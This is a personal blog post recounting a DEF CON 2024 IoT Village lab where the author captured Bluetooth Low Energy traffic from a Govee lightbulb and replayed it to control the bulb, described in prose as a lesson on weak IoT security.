Defcon 2024 - Hacking Govee IoT Light Bulbs

I wanted to share an amazing hands-on lab experience I had at DEFCON. If you’re on the fence about attending, I highly recommend it! I was fortunate enough to be sent by my company, and it turned out to be one of the best experiences of my life. Here’s a little blog I wrote about one of my standout moments at DEFCON — I hope it inspires you to check it out for yourself!

In today’s technological society, you likely have a few IoT devices in your household. A study revealed that among 1,500 families surveyed, respondents believed they had at least eight IoT-connected devices in their homes. These devices add convenience and simplicity to everyday life—why get up from the couch to turn on the lights when you can ask Alexa to do it for you? However, this convenience may come at a cost. Many IoT devices have been found to be vulnerable due to poor security practices. Common issues include outdated firmware, lack of authentication and encryption, poor implementation, man-in-the-middle attacks, and Bluetooth Low Energy (BLE) exploits.

One of the most unique villages at DEFCON was the IoT (Internet of Things) Village. The IoT Village focuses on improving security in the IoT industry by fostering collaboration between researchers and industry professionals. Within the IoT Village, there's a feature called the "Hacking Playground," which offers hands-on labs designed to teach the tools and techniques for discovering and exploiting common weaknesses in IoT devices, including Bluetooth Low Energy (BLE).

I participated in one of the BLE labs, where I analyzed BLE traffic and executed attacks using Python to control an IoT device. BLE is designed for low power consumption, making it ideal for IoT devices. However, it has significant vulnerabilities, such as permitting unencrypted connections and insufficient authentication, which can lead to replay attacks.

In the hands-on exercise, we exploited a Govee lightbulb using BLE, showcasing a classic replay attack. A replay attack is a type of network attack where an attacker intercepts and captures valid data transmissions between two systems and then retransmits them later to trick the system into performing unauthorized actions. We captured the BLE traffic using a Bluetooth sniffing device integrated with Wireshark. The lightbulbs were on constant automation, transmitting traffic every few seconds, allowing us to capture the BLE packets. The exercise guided us in analyzing the traffic to identify commands that controlled the lightbulb's on/off state and color changes. Using Python, we connected to the Govee lightbulb via its MAC address, replayed the captured commands, and successfully controlled the lightbulb. The device accepted the commands because it lacked the necessary security checks, such as encryption and authentication, to distinguish between legitimate and unauthorized commands.

This exercise highlighted the serious security risks inherent in many IoT devices, particularly those using BLE. While these technologies offer convenience and efficiency, they often come with vulnerabilities that can be easily exploited if not properly secured. The hands-on experience at DEF CON’s IoT Village reinforced the importance of robust security measures in IoT devices, as even something as simple as a lightbulb can become a target if the right protections aren't in place.

This exercise really opened my eyes to the serious security risks inherent in many IoT devices, particularly those using BLE. While the exercise didn’t involve stealing personal credentials or personal identification information, it clearly demonstrated how easy it is to cause disruption with a denial-of-service attack by controlling the lightbulb.